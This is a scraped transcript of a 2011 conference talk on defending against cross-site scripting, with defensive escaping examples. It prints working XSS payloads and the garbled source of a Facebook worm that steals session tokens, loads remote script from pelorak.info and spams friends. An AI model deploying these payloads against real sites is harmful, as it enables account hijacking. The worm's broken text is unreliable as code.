Avoiding Cross Site Scripting - Not as easy as you might think (NDC2011, Erlend Oftedal)
Some security experts say it's easy to protect against... but that may not always be the case
Statistics
  Common error
  OWASP Top 10
  SANS Top 25 Most Dangerous Software Errors
  http://info.veracode.com/rs/veracode/images/soss-v3.pdf
XSS - statistics
  http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  http://security-sh3ll.blogspot.com/2011/05/twitter-xss.html
Risk
  Stealing data from client
  Stealing data from server
  Exploiting the browser
  Session hijacking
  Form manipulation - keylogging
    http://telenorsoc.blogspot.com/2008/10/malware-og-drive-by-exploits.html
http://www.bindshell.net/tools/beef/screenshots.html
Why the name Cross Site Scripting?
  <iframe src="http://mail.google.com">
    <script>
  </iframe>
Same Origin Policy
Two frames/windows may only speak if they share:
  the same host
  the same port
  the same protocol
Demo
What's going on?
  <input type="text" name="search" value="">
An input of 123 yields:
  <input type="text" name="search" value="123">
An input of hello"world yields:
  <input type="text" name="search" value="hello"world">
An input of hello"><script>alert(1)</script> yields:
  <input type="text" name="search" value="hello"><script>alert(1)</script>">
Types of Cross Site Scripting
  Reflected
  Persistent
  Second order / indirect / side channel
[Diagram: script/content and data flowing into the app]
What data can you actually trust? Scripts? Web services? Databases?
Input validation
  Blacklisting keywords
  Blacklisting/whitelisting characters
How do you validate input?
  Input:       test
  Validation:  [a-z]+
How do you validate input?
  Input:       "this is a test"
  Validation:  [a-z"]+
How do you validate input?
  Input:       Conan O’Brian
  Validation:  [a-zA-Z"']+
How do you validate input?
  Input:       No, your calculation is wrong, because x > 5
  Validation:  [a-zA-Z"'>.,]+
How do you validate input?
  Input:       Try moving the <script> tag to the bottom of the page.
  Validation:  [a-zA-Z"'<>.,]+
ASP.NET Request Validation
  Throws exception on: &# or < followed by a-z, !, ? or /
  Can be disabled per page / model field
  Sometimes good reason to disable
  Only stops the simpler attacks
Demo
A couple of tricks
Build a javascript string without quotes:
  String.fromCharCode(88, 83, 83)
  /XSS/.source
Running script without user invocation:
  <img src="x" onerror="alert(1)" />
  <input ... value="" autofocus onfocus="alert(1)" />
HTML escaping – almost there, but not quite
System.Web.HttpUtility.HtmlEncode(string s) replaces:
  < with &lt;
  > with &gt;
  " with &quot;
  ' with &#39;
  & with &amp;
  ASCII 160 to 255 with &#nn;
It's all a matter of context
Per context escaping
We need to escape depending on context(s).
OWASP XSS Prevention Cheat Sheet: rules for context and escaping.
Rule #0 - Forbidden
  <script>...NEVER PUT UNTRUSTED DATA HERE...</script>     directly in a script
  <!--...NEVER PUT UNTRUSTED DATA HERE...-->                inside an HTML comment
  <div ...NEVER PUT UNTRUSTED DATA HERE...=test />          in an attribute name
  <NEVER PUT UNTRUSTED DATA HERE... href="/test" />         in a tag name
Rule #1 - Between tags
  <div> ...HTML ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE... </div>
  => HTML escaping
Rule #2 - Attributes
  Inside unquoted attribute:
    <div attr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...> content </div>
  Inside single quoted attribute:
    <div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'> content </div>
  Inside double quoted attribute:
    <div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."> content </div>
  => HTML attribute escaping
Rule #3 - In javascript strings
  Inside a quoted string:
    <script> alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...') </script>
  One side of a quoted expression:
    <script> x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...' </script>
  Inside quoted event handler:
    <div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"></div>
  => JavaScript escaping
  NEVER put untrusted data inside strings passed to eval(), setInterval() and similar
Rule #4 - In CSS
  <style> selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>
  <style> selector { property : "...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."; } </style>
  <span style="property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."> text </span>
  => CSS escaping
Rule #5 - URLs
  <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a>
  => URL escaping
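The encoders that Rules #1 to #5 call for, as an added JavaScript example (not code from the slides or from OWASP); the function names and the small entity decoder that stands in for the browser are assumptions made here. The last four functions show why the quoted event handler in Rule #3 needs JavaScript string escaping before HTML attribute escaping, and htmlEscape is the fix for the `value="..."` reflection in the demo slide.

```javascript
// Per-context output encoders for Rules #1 to #5 (added example, not from the
// slides). Each function is only correct for the single context named in its
// comment; the event-handler functions at the end show the nested case from
// Rule #3, where two encoders must be layered.

// Rule #1 (between tags) and Rule #2 (quoted attribute): entity-escape & < > " '.
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Rule #2 (unquoted attribute): whitespace, "=", ">" or "/" would end the value,
// so everything outside [A-Za-z0-9] becomes a numeric entity.
function htmlAttrEscape(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => "&#x" + c.codePointAt(0).toString(16) + ";");
}

// Rule #3 (inside a quoted JavaScript string): \xHH / \uHHHH / \u{H...} escapes,
// so the data can never close the quote or the enclosing </script>.
function jsStringEscape(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    if (cp < 0x100) return "\\x" + cp.toString(16).padStart(2, "0");
    if (cp < 0x10000) return "\\u" + cp.toString(16).padStart(4, "0");
    return "\\u{" + cp.toString(16) + "}";
  });
}

// Rule #4 (CSS value): \HH followed by a space; the space terminates the escape.
function cssEscape(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => "\\" + c.codePointAt(0).toString(16) + " ");
}

// Rule #5 (URL parameter value): percent-encode the value only, never the whole
// URL, and only when scheme and host are a fixed constant.
function urlParamEscape(s) {
  return encodeURIComponent(String(s));
}

// Stand-in for the browser's attribute-value decoding, which runs before the
// JavaScript engine ever sees an inline event handler (assumption: this subset
// of entities is enough for the demonstration).
function htmlEntityDecode(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp > 0x10ffff ? m : String.fromCodePoint(cp);
    }
    const r = named[body.toLowerCase()];
    return r === undefined ? m : r;
  });
}

// Rule #3's event-handler example, <div onmouseover="x='...'">, done wrong:
// HTML escaping alone. The browser decodes &#39; back to a quote before the
// JavaScript parser runs, so the data ends the string literal.
function eventHandlerHtmlOnly(untrusted) {
  return `<div onmouseover="x='${htmlEscape(untrusted)}'"></div>`;
}

// Done right: escape for the inner (JavaScript string) context first, then for
// the outer (HTML attribute) context.
function eventHandlerLayered(untrusted) {
  return `<div onmouseover="x='${htmlEscape(jsStringEscape(untrusted))}'"></div>`;
}

// The JavaScript source the engine receives for the handler built above.
function handlerSourceSeenByEngine(html) {
  const m = /onmouseover="([^"]*)"/.exec(html);
  return m ? htmlEntityDecode(m[1]) : null;
}

// True when the handler is still exactly one assignment of one single-quoted
// string literal, i.e. the untrusted data stayed data.
function stillOneStringLiteral(js) {
  return /^x='(?:[^'\\]|\\.)*'$/.test(js);
}
```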
http://www.hackersbay.in/2011/05/facebook-worm-spreading-verify-my.html
var message = "Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process..."; varjsText= "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; varmyText= "==>[VERIFY MY ACCOUNT]<=="; varpost_form_id= .getElementsByName('post_form_id')[0].value; varfb_dtsg= .getElementsByName('fb_dtsg')[0].value; varuid= .cookie.match( .cookie.match(/c_user=(+)/)[1]); var friends = new  (); gf= new XMLHttpRequest();  gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" +uid+ "&"+ .random(),false);  gf.send();  if(gf.readyState!=4){ }else{  data = ('(' +gf.responseText.substr(9) + ')');  if(data.error){ }else{  friends =data.payload.entries.sort(function(a,b){return a.index-b.index;}); } } for(var i=0; i<friends.length; i++){ varhttpwp= new XMLHttpRequest(); varurlwp= "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; varparamswp= "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" +post_form_id+ "&fb_dtsg=" +fb_dtsg+ "&feed_info[action_links][0][href]=" + (jsText) + "&feed_info[action_links][0][text]=" + (myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid+ "&user_message=" + message; httpwp.open("POST", urlwp, true); httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange= function(){ if (httpwp.readyState== 4 &&httpwp.status== 200){ } } httpwp.send(paramswp); } alert("Verification Failed. 
Click 'OK' and follow the steps to prevent your account from being deleted."); .location = "http://pelorak.info/verify.php?js";
varmyText = "==>[VERIFY MY ACCOUNT]<=="; varjsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; ... For each friend post a message { varurlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; varparamswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id +  "&fb_dtsg=" + fb_dtsg +  "&feed_info[action_links][0][href]=" +  (jsText) +  "&feed_info[action_links][0][text]=" +  (myText) +  "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +  "&user_message=" + message; ... }
Rule #6 - Use a policy driven engine
  Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way.
  Must be a whitelist based engine.
  OWASP AntiSamy
  HtmlPurifier
Why you do NOT write your own HTML-cleaner/sanitizer
  <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  <BODY onload!#$%&()*~+-_.,:;?@[/|^`=alert("XSS")>
  <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
  <charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾
  http://ha.ckers.org/xss.html
Rule #7 - Avoid DOM based XSS
DOM based XSS
Insecure handling of input in javascript - reading values from native javascript objects/properties like:
  document.referrer
  window.location.hash
Allows attacks present in URLs that are never seen by the server:
  http://www.somesite.com/#banner=may2011
  http://www.somesite.com/#banner=may2011"><script>...
Demo
  $(location.hash)
  $("#<script>alert(1)</script>")
  http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22
Avoiding DOM based XSS
  Beware of the complex contexts
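Treating location.hash as data rather than as a jQuery selector or markup, for the `#banner=may2011` URL from the slides, as an added example (not code from the slides); the banner table, the function names and the element stub in the usage are constructed for illustration.

```javascript
// Safe handling of the URL fragment (added example, not from the slides).
// Models the slide's URL http://www.somesite.com/#banner=may2011 and the
// $(location.hash) demo: the fragment never reaches a selector or innerHTML.

// Parse "#k1=v1&k2=v2" into a prototype-less object of decoded keys and values.
// Returns null when the fragment carries malformed percent-encoding, which
// decodeURIComponent reports by throwing a URIError.
function parseHash(hash) {
  const params = Object.create(null);
  const body = hash.startsWith("#") ? hash.slice(1) : hash;
  if (body === "") return params;
  for (const pair of body.split("&")) {
    const eq = pair.indexOf("=");
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? "" : pair.slice(eq + 1);
    try {
      params[decodeURIComponent(rawKey)] = decodeURIComponent(rawVal);
    } catch (e) {
      return null; // e.g. "%E0%A4%A" or a bare "%"
    }
  }
  return params;
}

// A banner name is a short token: letters, digits, "-" and "_" only.
const BANNER_NAME = /^[A-Za-z0-9_-]{1,32}$/;

// Known banners (constructed sample data). Looking the value up as a key means
// the untrusted string is never used to build a selector or markup.
const BANNERS = {
  may2011: { text: "Spring campaign", href: "/campaigns/may2011" },
  default: { text: "Welcome", href: "/" },
};

// Returns the banner record for the fragment. Anything that fails the whitelist
// or is not a known key, including '#banner=may2011"><script>...' from the
// slide and inherited names such as "__proto__", falls back to the default.
function chooseBanner(hash) {
  const params = parseHash(hash);
  const name = params === null ? undefined : params.banner;
  if (typeof name === "string" && BANNER_NAME.test(name) &&
      Object.prototype.hasOwnProperty.call(BANNERS, name)) {
    return BANNERS[name];
  }
  return BANNERS.default;
}

// Replacement for $(location.hash): extract an id token (must start with a
// letter) and use it only with document.getElementById, never as a selector
// string that a library may decide to parse as HTML.
function idFromHash(hash) {
  const m = /^#([A-Za-z][A-Za-z0-9_-]*)$/.exec(hash);
  return m ? m[1] : null;
}

// Write the chosen banner into a known element through textContent and
// setAttribute, never innerHTML. `el` is any DOM element (or a stub in tests).
function applyBanner(el, banner) {
  el.textContent = banner.text;
  el.setAttribute("href", banner.href);
  return el;
}
```

In a page this would be wired as `applyBanner(document.getElementById("banner"), chooseBanner(location.hash))`.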

Weitere ähnliche Inhalte

Was ist angesagt?

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015gmaran23
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
Spring Security
Spring SecuritySpring Security
Spring SecurityBoy Tech
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum   Top 10 A3 - 6th meetingOWASP Khartoum   Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
 
Spring Security
Spring SecuritySpring Security
Spring SecuritySumit Gole
 

Was ist angesagt? (20)

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
Spring Security Introduction
Spring Security IntroductionSpring Security Introduction
Spring Security Introduction
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoat
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
 
Spring security
Spring securitySpring security
Spring security
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum   Top 10 A3 - 6th meetingOWASP Khartoum   Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meeting
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session management
 
Spring Security
Spring SecuritySpring Security
Spring Security
 

Andere mochten auch

What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great InfographicsSlideShare
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareEmpowered Presentations
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShareKapost
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...SlideShare
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingContent Marketing Institute
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation OptimizationOneupweb
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksSlideShare
 

Andere mochten auch (8)

What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great Infographics
 
You Suck At PowerPoint!
You Suck At PowerPoint!You Suck At PowerPoint!
You Suck At PowerPoint!
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShare
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
 

Ähnlich wie Avoiding Cross Site Scripting - Not as easy as you might think

Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter AppsDamon Cortesi
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Clientgrutz
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 

Ähnlich wie Avoiding Cross Site Scripting - Not as easy as you might think (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">
 
Fav
FavFav
Fav
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Web Security
Web SecurityWeb Security
Web Security
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 

Kürzlich hochgeladen

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
